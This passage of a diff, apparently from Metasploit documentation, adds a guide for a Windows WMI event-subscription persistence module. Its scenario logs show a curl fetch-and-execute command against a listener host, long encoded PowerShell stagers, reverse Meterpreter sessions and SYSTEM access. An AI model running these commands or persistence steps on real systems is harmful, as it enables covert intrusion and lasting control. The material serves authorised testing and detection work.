gAegAzAE8AWABOAFkAKwBCADUANAAyAGQAeAB2AE8ATQA3AFgAbgBwAGMAUwAvAHoATgAzADAATwBjAGkAMwBkAE4AcwBtAGoAawA5ADQAYwAvAHoAdgAvAEcAOABkAFIAMQA0AFAAcAAwADMANQAzAHUAZQBuAEoAcgAvAFAARgA5ADgAYwB2AHoAUgB0AGUAQwB2AHUAJwArACcAUwBjAGMAcwBYAC8ASAA4ADgAewAxAH0AWgAvAGwAdQBuAHsAMgB9AEgALwBxAGgARgBQAFoAOAA4AHsAMQB9ADgAdQBLAFgAZQByAFYAZgBDAGYAWABQAEwAbgBNADQAOABIAEcAbgBlAHUAMABYAGYANgBUAHYASAB6AFQAdwBqAFAAQwB0ACsAMQBxAEcARgArAFgAVAB1ACsAdgBkADkAWgBCAC8AOABmADMAagB0ADYAMgAxADQAewAyAH0AYwAvACsATgAvAEIATgBsADMAcwBEAHYAcwBjACsAegBqAFAAUAAvAEUAagB6AFkAZQB7ADIAfQBQAFcAMwBDACcAKwAnAEgAMwB1AEMANQBOADAAagAzAFIAcwBxAG4ANQByAEQAVQBoADkAegB2AGcANwB4AGwAegBiAHkAUgBnAGIAJwArACcAdQB0ADkAWQByAHYAWABUAFQAWABVAEQAZgB3AGoAWgArAFAAMgBEAFAAeABmAFUAZgBOAGYAYwBlAGQANwBTAHYANQBiAHMAKwB2ADUAcAB7ADEAfQBqAC8ASAA3AEoAZQBSAHYAcQBSAFgAVgAzAHUAOAB2AGUAKwBmADcASQBjADkAbABWADAAbQBuAGMARwA5AE8AZgBtAE8AZABLADUAcgBMADIALwAvADMALwAxAEwAKwArAFQAOQA5AEUATABsADQAMABuADEAYgBOAFgATgBlAGkATABsADkANABYAGwATQBmAHkAUgA3AFoAMQBVADcAegBsAC8AQwA2AGcARQBlADEALwA1AGcAKwB4AFAAMQBSAG4ATwB4AE8AOQAvAHQAJwArACcATAA3AHUAbQB1AHcAUwBOADgAWgB4ACcAKwAnADcAMgBmAFkAbgBlAGUANgA2AHsAMQB9AC8ANwA5AEgALwBQAG4AbgBtADkALwArADgAYQBZADYAYgBoAC8AZQAvAE8AdAAvAGcAbgA4ADYAewAxAH0AagBFAFoAQQBBAEEAewAwAH0AJwApAC0AZgAnAD0AJwAsACcAUQAnACwAJwBvACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= -InputFormat None +[+] Payload successfully staged. +[+] Final command JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEwAcQBtAEgAMgBrAEMAQQA0ADIATwBNAFEAdgBDAE0AQgBTAEUALwAwAHEASABTAEYATwAwAG4AYwBTAGgANABxAEwARQA0AHUAUgBRADYAMQBKAEUAWQBuADEASwBiAFAAbwBpAFMAUQBnAHQAMQB2ADkAdQBpAGcAJwArACcAcQBPACcAKwAnAHYAdQBsADQAZAAzAHgAMwBKAFUATQBuAHQATQBJAEcAMABCADcAUwBOAEEAUAA3ADgAOQBoAHoATABmAGgASgBnAHEARgBoAFkAVQBDAEgAVQBWAEoARABaAC8AbwBjAEoARgBRADIAegBxADAAewAyAH0AZQBBADIASwBpADcATgBjAHMAYQB6AFAAbABiAGIAeAA5AG4AVAB6AFgAewAxAH0AOQA2AEUATgAnACsAJwBtAE4ARgArAFUALwBkAEUAcQBPAGsAdwAvAC8ATwBkACsAZwBVAHoAWABFAHIATAAxAHIATQBFAFkAbwBEAEEAZwBsAHQATgB4AEIAYQB4AE8ARwBsAFQAcgA3AFMAawA4AHEAVQBIAGcATgBpAFMAZQArAFoAdwB7ADAAfQBoAGwAVQBJAEgAZQBpAGgAYQBhADkAVQBzAHUAWQBIAFoAOQBPAHYASwBMAGgAcgB1AEIAYgB3AFoAcQBnAEQAdgBBAEEAQQBBACcAKQAtAGYAJwB5ACcALAAnAGoAJwAsACcAVwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkA +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEwAcQBtAEgAMgBrAEMAQQA0ADIATwBNAFEAdgBDAE0AQgBTAEUALwAwAHEASABTAEYATwAwAG4AYwBTAGgANABxAEwARQA0AHUAUgBRADYAMQBKAEUAWQBuADEASwBiAFAAbwBpAFMAUQBnAHQAMQB2ADkAdQBpAGcAJwArACcAcQBPACcAKwAnAHYAdQBsADQAZAAzAHgAMwBKAFUATQBuAHQATQBJAEcAMABCADcAUwBOAEEAUAA3ADgAOQBoAHoATABmAGgASgBnAHEARgBoAFkAVQBDAEgAVQBWAEoARABaAC8AbwBjAEoARgBRADIAegBxADAAewAyAH0AZQBBADIASwBpADcATgBjAHMAYQB6AFAAbABiAGIAeAA5AG4AVAB6AFgAewAxAH0AOQA2AEUATgAnACsAJwBtAE4ARgArAFUALwBkAEUAcQBPAGsAdwAvAC8ATwBkACsAZwBVAHoAWABFAHIATAAxAHIATQBFAFkAbwBEAEEAZwBsAHQATgB4AEIAYQB4AE8ARwBsAFQAcgA3AFMAawA4AHEAVQBIAGcATgBpAFMAZQArAFoAdwB7ADAAfQBoAGwAVQBJAEgAZQBpAGgAYQBhADkAVQBzAHUAWQBIAFoAOQBPAHYASwBMAGgAcgB1AEIAYgB3AFoAcQBnAEQAdgBBAEEAQQBBACcAKQAtAGYAJwB5ACcALAAnAGoAJwAsACcAVwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkA -InputFormat None +[+] Cleaning up 4248 +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEwANgBtAEgAMgBrAEMAQQA0AHQAJwArACcAMgB6AFMAdgBMAEwATQByAFAAeQAwAHsAMAB9AE4ASwA0AG0AMQBzAG4ASgBQAEwAVQBFAFMAQwBFAHMAcwB5AGsAeABNAHkAawBrAHQAMQBsAEEAUABMAFUANAB0AFUAdABmAFUAeQAwADYAdABMAEsANABKAFQAcwAxAEoAVABTADcAUgBEAFMANABwAHkAcwB4AEwAVgB3AGgATgAnACsAJwBLAHkAdABKAHoASABkADEAcgAxAEcAdABqAGsAWQAxAEwAQgBpAHIAWQBSAG8AcQA4AFQAbwBxAGUAYQBVADUATwBUAHAAUQBRADIAcwBCAHsAMQB9ACsALwBDADgAbwBRAEEAQQBBAEEAPQAnACkALQBmACcAMwAnACwAJwBXACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQBlAGMAaABvACAAJwBzAFUAdQBoAEwAaAB0AEwAJwA7AA== -InputFormat None +[+] Persistence installed! Callback should be in: 30m +[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251120.3942/WIN10PROLICENSE_20251120.3942.rc +[*] Sending stage (188998 bytes) to 1.1.1.1 +[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:50541) at 2025-11-20 18:40:45 -0500 +[*] Sending stage (188998 bytes) to 1.1.1.1 +[*] Meterpreter session 3 opened (2.2.2.2:4444 -> 1.1.1.1:50543) at 2025-11-20 18:41:44 -0500 +msf exploit(windows/persistence/wmi/wmi_event_subscription_interval) > sessions -i 2 +[*] Starting interaction with 2... + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +``` diff --git a/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_process.md b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_process.md new file mode 100644 index 0000000000000..e4ae346b5c8f9 --- /dev/null +++ b/documentation/modules/exploit/windows/persistence/wmi/wmi_event_subscription_process.md @@ -0,0 +1,144 @@ +## Vulnerable Application + +This module will create a permanent WMI event subscription to achieve file-less persistence using an event filter +that triggers the payload when the specified process is started. + +Additionally a custom command can be specified to run once the trigger is +activated using the advanced option CUSTOM_PS_COMMAND. This module requires administrator level privileges as well as a +high integrity process. It is also recommended to use staged payloads due to powershell script length limitations. + +## Verification Steps + +1. Start msfconsole +2. Get a shell on Windows +3. Do: `use exploit/windows/persistence/wmic/wmi_event_subscription_process` +4. Do: `set session #` +5. Do: `run` +6. Wait +7. You should get a shell. + +## Options + +### PROCESS_TRIGGER + +The process name to trigger the payload. Default: `CALC.EXE` + +### CLASSNAME + +WMI event class name. Default: `UPDATER` + +## Scenarios + +### Windows 10 1909 (10.0 Build 18363) + +Original Shell + +``` +resource (/root/.msf4/msfconsole.rc)> setg verbose true +verbose => true +resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 +lhost => 1.1.1.1 +resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp +payload => cmd/linux/http/x64/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL +fetch_command => CURL +resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true +fetch_pipe => true +resource (/root/.msf4/msfconsole.rc)> set lport 4450 +lport => 4450 +resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3 +FETCH_URIPATH => w3 +resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB +FETCH_FILENAME => mkaKJBzbDB +resource (/root/.msf4/msfconsole.rc)> to_handler +[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/KAdxHNQrWO8cy5I90gLkHg & start /B %TEMP%\mkaKJBzbDB.exe + +[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd +[*] Payload Handler Started as Job 0 +[*] Fetch handler listening on 1.1.1.1:8080 +[*] HTTP server started +[*] Adding resource /KAdxHNQrWO8cy5I90gLkHg +[*] Adding resource /w3 +[*] Started reverse TCP handler on 1.1.1.1:4450 +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > +[*] Client 2.2.2.2 requested /KAdxHNQrWO8cy5I90gLkHg +[*] Sending payload to 2.2.2.2 (curl/7.79.1) +[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:49758) at 2025-11-22 11:28:54 -0500 + +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > sysinfo +gComputer : WIN10PROLICENSE +OS : Windows 10 1909 (10.0 Build 18363). +eArchitecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x64/windows +meterpreter > getuid +Server username: WIN10PROLICENSE\windows +meterpreter > background +[*] Backgrounding session 1... +``` + +Persistence + +``` +msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/wmi/wmi_event_subscription_process +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > set session 1 +session => 1 +msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > exploit +[*] Exploit running as background job 1. +[*] Exploit completed, but no session was created. + +[*] Started reverse TCP handler on 1.1.1.1:4444 +msf exploit(windows/persistence/wmi/wmi_event_subscription_process) > [*] Powershell command length: 6851 +[-] Compressed size: 14136 +[-] Compressed size may cause command to exceed cmd.exe's 8kB character limit. +[+] Launching stager: +[+] - Bytes remaining: 14136 +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAE8AYgBrAEkAVwBrAHsAMQB9AEEANgBXAFoAUwAzAGMAYQBXADcASwBFAC8AMAByAFAAMwBIAGUAdABIAGkAQgBMADgAdgBVADUAcwAwAHsAMgB9AFUARAB5AEgAQQBCAFIAewAyACcAKwAnAH0AWQBlAHYAVwBBADEAeQAzADcASQBBAGsAZgB5AFYASgBKACsAdgBVAGQAWAArAHcAewAxAH0AYQBYADQAMQBZAHsAMgB9AG0ASwB2AGYATQBSAEcAUgBtAFoALwBEAHUANwBmAC8ANwA1AGMATABpAC8AMgA5ACcAKwAnADMALwAvAHMAKwBmAGYAMAA1ADIAdgB6ACsAOABNAFYAcwA5AC8ARgB5AHQAYgAzAGYALwAvAE4AVAB7ADIAfQAzADkAbQBQAHkAWABXAGUAUABjAHoAdgBQAC8AMwByACcAKwAnADAAMwBVAFoAaAAyAGcALwB4AHEAWgBxAC8AaABYAGQAWABxAHoAeQBaAGgAWABkAFAAQgBaAGwAOAB6AEUANgAnACsAJwBYADIATgBSAE4AUgArAGkAMwBZAGgAUgBHAFYAKwBpAE0ANABoAE4AMgBiAHkATgBUAGgAYgBiADAAJwArACcATwB0AFYARwBmADEAbwBqAHEASgBUAHgATABhAEsAMwA1AEYAJwArACcAOQA1AFgAJwArACcAdAAvADgANwArACsAMQA0AGkAcgBpAEsASgBxAFgAawBaADMAawBKADcAdgBOAE8ASwBtAGIARgA3AHoAbgBGADYAbgAzAEgATQA4AGIANQAwADMASgAvADUAZQAzAHQAegB6AHUAcwBHAHUANwB7ADEAfQBLAFcAZQBmAE0AOAByAGgAbwB4AHIAWgBvAC8AbwAzAFAAZwAvADcALwA0AFgAaQAvADQALwBoADYANwBHAHoAeQAvAHoAdQBNAHAAcwByADIAZQA0ADMAVQB7ADIAfQA2ADYAcgA1AE8ANwBxAFIAegB0AGYAOQBlAHUANABYAC8AcQB4AEwAUAB0AC8ARQByAHQAVAAvAFgAZAB2AFgAdwBHACsAZAArAHcAUAA3ACsAdgBIAC8AdQBiAGYAQgBjADcAKwA1AFIALwBkAGUAUgB0AHQAKwB2ADkAWgArAC8AUwBaAGUATgA5AEYAYwA4AC8ANAB1AGIANwA1AHgAbgBwACsALwB1AG8AaQA4AGEAagA1AEgANQB5AEsAMgB0AHIAZgBIADkANwBiAFIATwBpAGoAdQB6AHsAMgB9ADcALwAyADUAKwBzAHgAegBsAHYAbgBEAGMAcwBvAC8ARgArAC8AbAA1ACsATgBlADkAVABQAG0AVAAvADEAUwBZAG0AbwBjAC8AbAA5AHkAUgB2AE4AdQB1ADgAUABHAEQAbgBqAEgAeAAyAEgAMgBPAHsAMgB9AE4ALwArAEkATABPAE8AYwAxADIAZwBmADkATAA1AGUAcgAvAHoAYwBsAEgAcwBtAGwAZQA1AHQARABlAEsAbQBVAGoANwBhAFoAZQB5AHEAZQBJAGwAdQBnAC8ATwBHAGsAUwAwAGkAegA0AG4AZgBQAG8AcQA4ACcAKwAnACsAUgAxAGMAegBFAHIAbAByAHgAMgBSAFkAMQBkAFcAeABIAFUAVgBEADkAaQBoADUAMwA1AEcAZQA0AC8AOQBzADIAZwByAHoAawBFADgASAAyAFcAMwA3AG0AcwB0AFkAaABYAE4ASgArAEkAMQBLAFgAVgBQAFoAcgA5AC8AWQBIAGQAUgBSAFIAVwB0AEkAbABiAE8ANAB3AEcALwBGADcAeQAvAGkAMwBpAHUANwBSAHAARwBlADQARwBkAHkANwBoADYANQBOAHoAZgB0AFIAMgAvADgARwBmAGsAZgB7ADEAfQAxAGkAVwB1AHEANQBUAGcAVwArADkAdABHAHkALwAxAFcAMABpAFIAOQB4AHoAdgBEADcAZwB1AGUARwBlAFoAJwArACcAeQBCAHcAMABYAEoAdgBXAFcATQB5AFgATgByAHcAKwBjAHYAeABFAFUANABPAE8AZAArADUAVwB2AEsALwA5AHMAeQB6AHIARgAvAEYATQAxAHYAMgBEAEcATwArAE0AegByAGwAUABOADEAbgB1ADYALwA1AEwAbABKADYATgA0AHIAMQA5AGYAMwA2AEIAYgBrAFYALwBoAGUAZwBJADgAWAA4AGoAaQAnACsAJwBOAGMATAAzAHAALwBUAFAAcwBNADkANwBrADkAeABKADcAVwByADMAWQA1AEkAcQBQAHYAagA4AGcARAByAEoAcgB7ADIAfQBGAHgAbAAxADcARABpACsAVQAwAE0AUwBwADAAcgBPAC8AcQBWADQAdABQAEoAZQBlADQATQBPADQAYQA1ADgATgBrAGkAdgAzAHcAKwBJAE4ALwBHAGwAZQA3ADkAUwBUAHoAawA1AHgAbgA1ADYAVgBkAHgAegA3AGsAcgBQAHQAYwA5AGMALwB6AHcAOAAzAEgASgBlAFgAcgB1AEIAWAB1AE4AbgAyAFQAbgBUACsASgByAG4ATABZAGMAagB3AFAAZgBtADUAWABLAHkALwBFADgAMwAnACsAJwBTAE8ALwBjAC8AdwBmAGcASwBOAE8AagAvAHQASAAzAEsATgA4AHYAZgBLADkAWABZAEEAYgAxADgAVwByAGUAewAyAH0ARwA3AFYAVwBmAEsAMQA0AFgAagBFAE0AMwBQADEASwBIAE8AeQBTAEkAcgBZAHgAagBLAHMAMwBBADQAQgBXAGUASwA3AHoAagBYADUAOABMAFQASwBCAHsAMgB9AFAAKwBhAFAANABEAGsANwAzAFkAegBlAHYAcwB1AHUANgAwAG4ATgA2AFgAcgBnADEAYgBvAGIAdwBuAE8ANQBSAFgATQA4ACcAKwAnAGkAVQA3AHkAewAxAH0ATwBPADEAbABWAC8ATABYAE8AQgBBAHYANwBNAHIARQBSAHgAdgB5AEoAYgB1AFgAWgBmAE0ATwBQADEAUgBuAFMAMQA2ADMANABEAHEAcgA4AE8AOABIADgAWgBmADkAVAArAFIAcgBXAEkAWABxAFUALwB5AFMASwAnACsAJwA2AC8AdABQAEYAWgBsADQAbABQADUATwA2AEIAZQA1AE0AYwBjAFAAewAxAH0AcwAvAGoALwBZACcAKwAnAFAAZgBLAFUANgBYAGgAQgBuADIAWABOAEIAMwBGAHsAMgB9AFgAbAB6AFgAJwArACcAdQBaAGoAdwAvAHAAMAA2AEUAVgA5AGwAZgBnAHsAMQB9AFAAbAAzAGYALwByAEgAdABzAC8ASgBnADcAZwBvADUAUwAvAG4ARgBNADEALwB4AGQANwAvAGkAOQB2ADkAdgBEAC8AeAB2AFcANwBUADUALwByAC8AVgBuAG8AZgBYAHsAMQB9AEEAdgBiAEwAagBXAEsAOAA3AC8ASgBUAGQASQAvAGcAdwBlACsAVAAxAE8ALwB4AGkASAB1AGcAUwBYAC8AbQBqAGYAewAxAH0AbgAvAEsAKwBxADkAewAxAH0ASAAxAGYAOQBxADMASgB2ACsATABWAGQAeAB3AEwANABwAFUAUgB6ADMAawBlAGIANwBYAC8AdAA1AHgANwB7ADIAfQAvAHkAVgBsADYASAB2AHoANwBCAGoAewAyAH0ARAB5AEYAOQAzAFAAcwBNADQANgBGAFcAOQAyADcAdABQAC8AUgB2AE8ATAAvAE4AWAB6AGMAYwBwAHcAdQBUADMAbAB1AGIAMQBKAGQAMABEADkANABuAC8AbwAyAHIANQBzAEgATAByAEIAcgBtADgAdAB2ADUAVQBmADQAZgBNAE0AUAB4AFgAMAB7ADIAfQByAGMAQQBlADIAeQBjACsAeQBIAHcATwBmAEgARQA2AHQANQBmADYAawBOADcAZgBnAEYAdAA5ADcAOABoAC8AcwB2AHYAcwBuAFQAOAB2ADUASgA5AHcAcgB0AGMAQgBmAE4AWQBwAHkAVgBzAEQAdgBoAHUAQQBHACsARgBvAFIAUAB6AEYAcwB6ACcAKwAnAHYANABWAGQAJwArACcAOQBmAEUANABjAFUALwB4AHUAKwBaAHgANQB7ADIAfQB2AFcAKwB3AFUANwBnAFoAdwBpAHUAYwBaADkANABQAC8ARgA2ADUAMwA5AFoAOABJAFgAdABYADEATQBIAEEAZgBVAGEANABNAEUANQA3AEoALwB0AGMAWgA1ADEAQgAnACsAJwArAGwAegAyAEsAdwA4AEYAMwB6AHYAZQBMAHoANwA5AFoAJwArACcAcgA3ADAAUABZAGYAVAArAHcAdgA2AHYAdgBwAFgAewAyAH0AUgA0ADYANABBAG8AKwAzADMAewAxAH0AKwA2ADIAYwBOAEgAMwBTAE4AagAxAGYAcwBVAHIAOQAvAGQAbAAwAGIALwA4ADcAcgBiAC8ASQA3AG8AegA3AEUALwAvAEwAegBCAFgAegBvADgAeAB3ACsAdQBzAEYAdQB4AFYAMQAyAHQAYwBuAFQAdgBPAFMAOABBADMAaAArADQAVgBWADEAUABhAGoAMQB4AHoAZgA2AHcAdwBqACsANgBtAHsAMgB9AEoAZgA2ADIAaQA5AHEATwBuADUAKwBnAGIAZQAvAHIARABKAGMALwByAGYATwBkAG4AbABjAFAAagA1AHMAOQBYACsAcwBpAGMAUABtAFMAZQBoAGoAYwBIADgASABSAFIAMQA5AEUAWgBkAHEAMwBmACsAZQBFADEANgBSAGYAWgBUAFIAOABBADUAKwBwAHYAeQB2AE8AZAArAHgAVgAyAFoAZQBhAFgATQAzAHsAMQB9AGwAKwBtAC8AewAyAH0AcAB4AGYASABmAGsAMwAvAE4AZgA3AGgANgBhAC8AWQAzAHcARwB2AHkAcQA5ADUAZQBrAEEALwBVAHoANABWAHQAMgAvAG0AYgBmAG8AWAA1ADQAVABzADEAMwBNAGIAMQAwADEARgB2AHEAKwBvAGEAOQAzAC8AQgBUADkAbQA4AEYALwBxAHUAOAA3AFAAdQBKAFIALwByAGkALwB3AHQAewAyAH0ARQAzAEsALwB3AGMARwB6ADgAOQA3AEwATQB1AG0ATQBBAEQAcQB0AHMAYgA5AEUANgB5ADQANQB2AHoARgB3AG0AUAA1AHYAMgBPACsAKwA2AFMAZgBNAHoAZwBtADYANQA0AEYAZgA3AFAARgBxAG4AdQAyAC8AewAxAH0AVQArAGsAQQBIAEgAdAB7ADEAfQByADgAcgA0AHkARABoADYAeAA4AHcALwBpAHQAcQBWAHYAeQBZADYAagBmAGYAMABhAFYANwBzADgAOABhAFgAOQBVAEQAMgBJAEoAegBQAGkAcwB5AE8AZQA4AG0AOABGAHYAKwBnACsAeABlACcAKwAnAE0AYwB1ADIAYgB3AGoAagA3AHYAbQB6AGMATAArAHUANwBkAFMAVQBlAGkAZwAwAHIAeAB7ADIAfQBkAEkARgBaADgAVAB4AGgAagB3AEoAdAA2AG4AUABEAGUAZwBEADMALwBCAHoARABqADUAUwB2AHoAMwBuAG4AaQBtAHYAOABtAFAAcwAvAHQAWABnAHYAaABWADkAYQAxAHIAcgBwADcAWAA5AHIAZgBNAG8AdgAzAGYAVwBVADMAdgBxADQAcwBKADgAVQBxAGEANABxAGIAOABWADUATwBHAEcAdgB0AHgAMgB2AEoAOQBxAHYAZgBBAEEASABqAGYAWQBxADcAcAAxAC8AbgBWAE8AdwBiADIAbgBQAGsAewAyAH0AZQA0AEEAWAAwAHMAcwA1AFgAUABHAGIAMABSAGYASQBNAGIAaABMAFAANQBlAGkAUgBxAGYAVQAyAGUAQQB2AHIAeQBsAEcAZQAnACsAJwBlAEYAQgArADEAegB6AE8AKwB3AGYATwBkADUAMgBOAFgAUwA4AGwALwB3ACsAbwAyADcAWAAxAG0AUABYAFYAQQByAHcASwBoAHkALwBXAEsANQBGADAAdwBzADAANwAzAGgAVwBYAGoARAA3AGYAZwBKAGMAbgAxAHUALwBLAHsAMgB9ADAANgArADkAdABUADEAWgA4ADQAZABsAEwAeABLAG4AMQBmAHcAZwBlAHYAaAB7ADIAfQBGADcANgA1AEUAdgA4AE0AagBkAHUATgArAGkAZwBCACsASQAyAE4ANQArAFcAMQBOAG0ATgArADIAMQA5AHoAdAB4ADYAYgBVAEcAYwBoACsANQBmADgASgBQAGkATwBZAG0ARQBsAHoANQA5AFUAMwBoAFgAZgB0AHIAVQA1AFoAeQA2ADAARAAzAHsAMQB9AGoALwB2AEYARgByADIASgBiAHMAcQBwAG0AdwBQAHgAdAB0ADQANgA5AFMAdgBpAEsASAAyAGcAJwArACcATwBJADAAVABQAHUAQQBGADkAQgBpADgAUgBKADkAVQBQAG8AVwBUAHsAMQB9AFgAWgBtADQAQQBFAGUANgBJAEgAVABPAC8ATABqAHYAawBSAGYASwAnACsAJwBaAFUASAArAFMAVQAvADcAOABtAFgAOAB0ADEAegAzADgAcABUAFAANwA1AHgAMwA4AHYAaAByAHgAeQA3AGgAdQA1AFgANABCAGoALwA2AGIAZgB7ADEAfQBiAC8AdABkAG4AeABtAEgANQBMADMAdQBoAHcAdAA0AFUAZQAnACsAJwBlAHQAMwAnACsAJwBTAC8AewAyAH0AagBlAGgARgA2ADQAOQByADEAeABQADUAcAA1AC8ARABHADgAcgBuACcAKwAnAEcAUAB0AGEALwBsADcAUABQAEYAcwBlADgANQBmAHEAVwAvAEUAWgBjAC8ALwB7ADIAfQAvAGIAZQBvAGQAZQBiAFgAbAB7ADEAfQBmADYAQQBmADUAawB4AHMAbQBkACsAMABrAHUASABTAEUANwAxAEsAOAB2AGEAdgAxAHEAMwBHAC8AQQByAGUAcAAxAFQAcgA5AHUAVwBaACsAOAA0AFkALwBpADcATAAnACsAJwBsAGoAagBuADEAZABuAC8AZABFAEgAcwBmAGsAZwB6AHIARgBMAHYAcAByACsAWQBGAEgAVgBhAGUASwBVAHoALwAxAGUAKwB6AEsAbwBuAEQAOQBGAGUAaQBBAFYALwBLAHcAcwBaADgATABlAEcAVABxAHYAbABvAG0AMwBTAGwAOQBkAGsALwArAHIAewAyAH0AKwA3ADQARABYAE4AVwBhAHIAagBOAHMAOABYAEoAWABXAHsAMgB9AG8AVwBkAHUAeQBmAGYAYQB1AGkAOABUAHYAcwBWAEQAKwBuADgARAAvADMAZABzAFgANABQAHYAVwA5